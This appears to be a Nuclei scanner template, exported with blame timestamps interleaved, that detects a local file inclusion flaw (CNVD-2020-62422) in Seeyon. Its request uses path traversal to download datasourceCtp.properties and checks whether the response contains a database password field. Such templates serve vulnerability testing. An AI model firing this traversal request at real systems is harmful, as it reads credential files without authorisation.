2021-01-30 10:45:17 +00:00
|
|
|
id: CNVD-2020-62422
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: Seeyon - Local File Inclusion
|
2021-01-30 10:45:17 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2022-07-26 13:45:11 +00:00
|
|
|
description: Seeyon is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://blog.csdn.net/m0_46257936/article/details/113150699
|
2022-01-05 07:39:36 +00:00
|
|
|
tags: lfi,cnvd,cnvd2020,seeyon
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-01-30 10:45:17 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-01-30 10:45:17 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-01-04 06:24:10 +00:00
|
|
|
|
2021-01-30 10:45:17 +00:00
|
|
|
- type: word
|
2022-01-04 06:24:10 +00:00
|
|
|
part: header
|
2021-01-30 10:45:17 +00:00
|
|
|
words:
|
|
|
|
- "application/x-msdownload"
|
|
|
|
condition: and
|
2022-01-04 06:24:10 +00:00
|
|
|
|
2021-01-30 10:45:17 +00:00
|
|
|
- type: word
|
2022-01-04 06:24:10 +00:00
|
|
|
part: body
|
2021-01-30 10:45:17 +00:00
|
|
|
words:
|
|
|
|
- "ctpDataSource.password"
|
2023-07-06 05:54:47 +00:00
|
|
|
condition: and
|